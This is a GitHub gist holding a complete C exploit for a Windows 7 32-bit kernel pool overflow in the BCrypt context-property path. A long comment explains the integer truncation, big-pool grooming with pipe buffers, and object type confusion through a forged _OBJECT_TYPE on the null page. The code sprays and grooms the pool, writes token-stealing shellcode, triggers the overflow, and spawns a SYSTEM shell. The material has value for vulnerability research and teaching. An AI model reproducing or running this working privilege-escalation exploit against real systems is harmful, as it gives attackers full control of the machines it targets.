Skip to content

Instantly share code, notes, and snippets.

@vp777
Created July 17, 2021 18:09
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save vp777/ed5fda418263ec47bd68090a8ee1df9e to your computer and use it in GitHub Desktop.
Save vp777/ed5fda418263ec47bd68090a8ee1df9e to your computer and use it in GitHub Desktop.
/*
The vulnerable function takes as input an array of bytes and outputs their hex representation in unicode. The hex encoded bytes are separated by space (0x20)
For example:
user input : 0 129
output buffer (vulnerable_chunk): 30 00 30 00 20 00 38 00 31 00 20 00
With regards to the vulnerability itself, the problem exists in the output buffer (vulnerable_chunk) size calculation:
vulnerable_chunk_size = (user_controlled_size*6)%65536;
vulnerable_chunk = AllocateMemory(vulnerable_chunk_size);
conver_to_hex(vulnerable_chunk, user_input, user_controlled_size*6)
As we can see, the vulnerable_chunk_size is 16 bit and as such the result of the multiplication gets truncated when the user provided size is big enough.
The problem is that the truncated multiplication result is used for the buffer allocation, but the non-truncated multiplication result is used for the actual procesisng of the data.
Exploitaton:
The plan now is to use the object type confusion technique described by Nikita Tarakanov in http://2014.zeronights.org/assets/files/slides/data-only-pwning-windows-kernel.pptx
change the type of an object with the overflow and make its _OBJECT_TYPE address point to 0. From there, we forge a fake _OBJECT_TYPE through which we gain code execution.
A good writeup on the technique can be found over: https://h0mbre.github.io/HEVD_Pool_Overflow_32bit/
We have some problems in this specific situation:
1. vulnerable_chunk deallocation
One important parameter of this overlfow is that the vulnerable_chunk gets deallocated by the end of the call to the vulnerable function.
What that means is that we have to be careful picking the vulnerable_chunk size.
This is crucial, because after the overflow, the next chunk will be overwritten with random data and it will trigger a bugcheck for example if the allocator expects a valid pool header on the next chunk. (e.g. to merge consecutive free chunks)
To work around this issue, we make use of allocations serviced by the big pool (no pool headers) and their size&0xfff>0xfe0 to avoid the use of fragments (splitting unused page memory).
Tarjei Mandt created an extensive resource on Windows 7 pool internals: https://www.exploit-db.com/docs/english/16032-kernel-pool-exploitation-on-windows-7.pdf
2. The overflow size && vulnerable_chunk
Since the overflow size will be greater than 65536, we have to make sure the vulnerable chunk is placed next to a user controlled memory the size of which is at least equal to the overflow size.
We achieve that by creating a big number of data entries (https://www.alex-ionescu.com/?p=231), we pick a point after which we expect the memory to be defragmented, free a data_entry and make the vulnerable chunk fall into that area:
Initial Stage:
|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|
Free Stage
|data_entry|data_entry|data_entry|__free chunk__|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|
Alloc Stage
|data_entry|data_entry|data_entry|++vulnerable_chunk++|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|
<--------------------overflow_size------------------------------>
3. Finding a suitable kernel object
We shouldn't have a problem picking a suitable kernel object. Our only restriction is having them fall within reach of the overflow.
We follow a similar strategy as we did in (2), we free a data entry at the tail of our buffer and allocate a number of kernel objects. We want to have the allocator give the freed pages of the data entry to the kernel objects:
Initial Stage:
|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|data_entry|
Free Stage:
|data_entry|data_entry|data_entry|data_entry|+data_entry soon to be vulnerable_chunk+|data_entry|data_entry|__free chunk__|data_entry|data_entry|
Alloc Stage:
|data_entry|data_entry|data_entry|data_entry|+data_entry soon to be vulnerable_chunk+|data_entry|data_entry|+ko+|+ko+|+ko+|data_entry|data_entry|
4. Object Type && overflow data limitations
As we have seen before, the overflow is composed only by the bytes 0, space (0x20) and digits (0x30-0x39)
Index 0 of ObTypeIndexTable holds the 0, and so as entries corresponding to 0x30+ (these are unused entries that hold that value 0)
The only problematic index would be 0x20 since it would be a valid entry for an object.
Even so, the odds are in our favor but we should still be able to avoid the space in the object type index with proper alignment of the chunks
5. Overflowing the kernel object with random data
The function handling the CloseHandle call (nt!ObpCloseHandle) doesn't make heavy use of the overflown fields which allows us to get away with using a badly corrupted object.
One important functionality performed when the handle of an object is closed is to verify whether that object is used by some other code and if not, to free the underlying heap memory.
This functionality is implemented through the PointerCount && HandleCount fields of _OBJECT_HEADER, which are essentially counters of the references to an object.
When their values drop down to zero, it means that the kernel can free the memory used by the object.
Since we have corrupted the pool header with random data, we don't want the chunk to get freed as it will trigger various bugchecks within the allocator.
Conveniently, our overflow filled these fields with random data (big values) so the heap memory of the object won't get deallocated
Epilogue:
More or less the same approach should work on Windows 7 x64 before the backported patch for null Page allocation restriction
Some information on how one could exploit this on Windows 7 without using the null page in addition to some thoughts on Windows 10 exploitation can be found over:
https://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation
*/
#include <stdio.h>
#include <winternl.h>
#include <Windows.h>
#include <Bcrypt.h>
#pragma comment(lib, "Bcrypt.lib")
//a lot of sizes are usable here,
//0x3555*6 % 65536 = 0x3ffe, the size will be rounded to 0x4000, no fragment will be created
//0x32a6-0x32aa, 0x3551-0x3555, ... should also be usable
#define BCRYPT_BUFFER_SIZE 0x37ff
#define DATA_ENTRY_HEADER_SIZE 0x2c
#define GROOMING_PIPES_NUMBER 500
#define PAGE_SIZE 4096
#define GROOMING_ALLOC_SIZE (4*PAGE_SIZE)
#define EVENTS_NUMBER 10000
char* g_buf;
typedef struct {
HANDLE r;
HANDLE w;
} PIPE_HANDLES;
void create_pipe(PIPE_HANDLES* ph) {
CreatePipe(&ph->r,
&ph->w,
NULL,
0x100000);
}
void write_pipe(PIPE_HANDLES ph, size_t sz) {
WriteFile(ph.w,
g_buf,
sz - DATA_ENTRY_HEADER_SIZE,
NULL,
NULL);
}
void read_pipe(PIPE_HANDLES ph, size_t sz) {
ReadFile(ph.r,
g_buf,
sz - DATA_ENTRY_HEADER_SIZE,
NULL,
NULL);
}
void bcrypt(void)
{
memset(g_buf, 0, BCRYPT_BUFFER_SIZE);
BCryptSetContextFunctionProperty(
CRYPT_LOCAL,
L"Default",
BCRYPT_CIPHER_INTERFACE,
L"AES",
L"Property",
BCRYPT_BUFFER_SIZE,
(PUCHAR)g_buf
);
}
bool allocate_null_page() {
DWORD(WINAPI * NtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID * BaseAddress, ULONG ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect);
*(FARPROC*)&NtAllocateVirtualMemory = GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtAllocateVirtualMemory");
PVOID pBaseAddr = (PVOID)1;
ULONG uSize = 0x1000;
return NtAllocateVirtualMemory(GetCurrentProcess(), &pBaseAddr, 0, &uSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == 0;
}
int main() {
PIPE_HANDLES grooming_handles[GROOMING_PIPES_NUMBER], extra_pipe;
char shellcode[] = "\xc6\x05\x00\x09\x00\x00\x01\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\x8B\x80\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x83\xB8\xB4\x00\x00\x00\x04\x75\xEC\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\xC2\x10\x00";
/*
//doesn't appear to be necessary, this is a way to communicate with the userspace code that our shellcode has been executed
0x0000000000000000: C6 05 00 09 00 00 01 mov byte ptr [0x900], 1;
//start of token stealing shellcode
0x0000000000000007: 33 C0 xor eax, eax
0x0000000000000009: 64 8B 80 24 01 00 00 mov eax, dword ptr fs:[eax + 0x124]
0x0000000000000010: 8B 40 50 mov eax, dword ptr [eax + 0x50]
0x0000000000000013: 8B C8 mov ecx, eax
0x0000000000000015: 8B 80 B8 00 00 00 mov eax, dword ptr [eax + 0xb8]
0x000000000000001b: 2D B8 00 00 00 sub eax, 0xb8
0x0000000000000020: 83 B8 B4 00 00 00 04 cmp dword ptr [eax + 0xb4], 4
0x0000000000000027: 75 EC jne 0x15
0x0000000000000029: 8B 90 F8 00 00 00 mov edx, dword ptr [eax + 0xf8]
0x000000000000002f: 89 91 F8 00 00 00 mov dword ptr [ecx + 0xf8], edx
0x0000000000000035: C2 10 00 ret 0x10
*/
g_buf = (char*)malloc(0x10000);
for (int i = 0; i < 1000; i++) {
CreateEvent(NULL, FALSE, FALSE, NULL);
}
for (int i = 0; i < GROOMING_PIPES_NUMBER; i++) {
create_pipe(&grooming_handles[i]);
}
create_pipe(&extra_pipe);
printf("[+] Allocating NULL page\r\n");
if (!allocate_null_page()) {
printf("[-] Couldn't allocate null page\n");
return 0;
}
printf("[+] Forging an _OBJECT_TYPE on null page\n");
memset(NULL, 0, 0x1000);
memcpy((void*)0x74, "\x00\x05\x00\x00", 4);
memcpy((void*)0x500, shellcode, sizeof(shellcode));
printf("[+] Spraying big pool to create a big contiguous chunk\r\n");
for (int i = 0; i < GROOMING_PIPES_NUMBER; i++) {
write_pipe(grooming_handles[i], GROOMING_ALLOC_SIZE);
}
//we could have probably injected some free chunks here and there to increase reliablility in case needed
printf("[+] Creating some holes at the tail of the buffer for the Events\r\n");
for (int i = GROOMING_PIPES_NUMBER-16; i < GROOMING_PIPES_NUMBER-10; i++) {
read_pipe(grooming_handles[i], GROOMING_ALLOC_SIZE);
}
printf("[+] Attempting to fill the holes\r\n");
HANDLE hevents[EVENTS_NUMBER];
for (int i = 0; i < EVENTS_NUMBER; i++)
hevents[i] = CreateEvent(NULL, FALSE, FALSE, NULL);
//just to make sure the following freed chunks will have high probability of reallocation in bcrypt
for (int i = 0; i < 0; i++) {
write_pipe(extra_pipe, BCRYPT_BUFFER_SIZE * 6 % 65536);
}
printf("[+] Creating some holes at the head of the buffer for the bcrypt vulnerable_chunk\r\n");
read_pipe(grooming_handles[GROOMING_PIPES_NUMBER-19], GROOMING_ALLOC_SIZE);
read_pipe(grooming_handles[GROOMING_PIPES_NUMBER-18], GROOMING_ALLOC_SIZE);
read_pipe(grooming_handles[GROOMING_PIPES_NUMBER-17], GROOMING_ALLOC_SIZE);
printf("[+] Triggering the overflow in bcrypt\r\n");
bcrypt();
printf("[+] Closing the handles of smashed objects and redirecting control flow\r\n");
volatile char* done = (volatile char*)0x900;
for (int i = 0; i < EVENTS_NUMBER && !*done; i++)
CloseHandle(hevents[i]);
printf("[+] Done\r\n\r\n");
system("cmd.exe");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment